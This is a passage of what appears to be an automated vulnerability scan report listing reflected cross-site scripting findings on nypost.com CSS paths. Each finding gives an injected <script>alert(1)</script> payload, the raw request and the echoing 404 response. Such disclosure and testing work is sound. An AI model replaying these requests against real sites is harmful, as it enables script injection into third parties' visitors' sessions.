<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/classifieds_verticals/classifieds_verticals.css11eb5<script>alert(1)</script>240343d24bd</p>
...[SNIP]...

1.209. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9004e<script>alert(1)</script>dc2a72fb414 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig9004e<script>alert(1)</script>dc2a72fb414/WebPortal/nypost/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.210. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1e704<script>alert(1)</script>cfdf90f07f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal1e704<script>alert(1)</script>cfdf90f07f2/nypost/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.211. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 38a9c<script>alert(1)</script>e29f874c4ff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost38a9c<script>alert(1)</script>e29f874c4ff/blocks/fat_header/fat_header.css</p>
...[SNIP]...

1.212. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de60c<script>alert(1)</script>24281a7b28a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksde60c<script>alert(1)</script>24281a7b28a/fat_header/fat_header.css</p>
...[SNIP]...

1.213. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f2df3<script>alert(1)</script>ac3fe82c465 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/fat_headerf2df3<script>alert(1)</script>ac3fe82c465/fat_header.css</p>
...[SNIP]...

1.214. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload f1102<script>alert(1)</script>3c9a06992d2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 725
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.cssf1102<script>alert(1)</script>3c9a06992d2</p>
...[SNIP]...

1.215. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc016<script>alert(1)</script>2745160a2e2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:05 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigcc016<script>alert(1)</script>2745160a2e2/WebPortal/nypost/blocks/footer/footer.css</p>
...[SNIP]...

1.216. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e041d<script>alert(1)</script>ef5daaa7b34 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortale041d<script>alert(1)</script>ef5daaa7b34/nypost/blocks/footer/footer.css</p>
...[SNIP]...

1.217. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b723f<script>alert(1)</script>624ac6e556 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 716
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostb723f<script>alert(1)</script>624ac6e556/blocks/footer/footer.css</p>
...[SNIP]...

1.218. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 41d96<script>alert(1)</script>dceb556a181 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks41d96<script>alert(1)</script>dceb556a181/footer/footer.css</p>
...[SNIP]...

1.219. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 67450<script>alert(1)</script>50498f63a55 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/footer67450<script>alert(1)</script>50498f63a55/footer.css</p>
...[SNIP]...

1.220. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload b2b3c<script>alert(1)</script>890670991d1 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/footer/footer.cssb2b3c<script>alert(1)</script>890670991d1</p>
...[SNIP]...

1.221. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6cc6e<script>alert(1)</script>ae37078603d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig6cc6e<script>alert(1)</script>ae37078603d/WebPortal/nypost/blocks/hat/hat.css</p>
...[SNIP]...

1.222. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4965a<script>alert(1)</script>4ae16c0be26 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal4965a<script>alert(1)</script>4ae16c0be26/nypost/blocks/hat/hat.css</p>
...[SNIP]...

1.223. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31704<script>alert(1)</script>d39de5160d8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:04 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost31704<script>alert(1)</script>d39de5160d8/blocks/hat/hat.css</p>
...[SNIP]...

1.224. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bd485<script>alert(1)</script>193890173be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocksbd485<script>alert(1)</script>193890173be/hat/hat.css</p>
...[SNIP]...

1.225. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 8c6a7<script>alert(1)</script>545a2c5be11 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:11 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/hat8c6a7<script>alert(1)</script>545a2c5be11/hat.css</p>
...[SNIP]...

1.226. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 65850<script>alert(1)</script>b4a82bde358 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/hat/hat.css65850<script>alert(1)</script>b4a82bde358 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
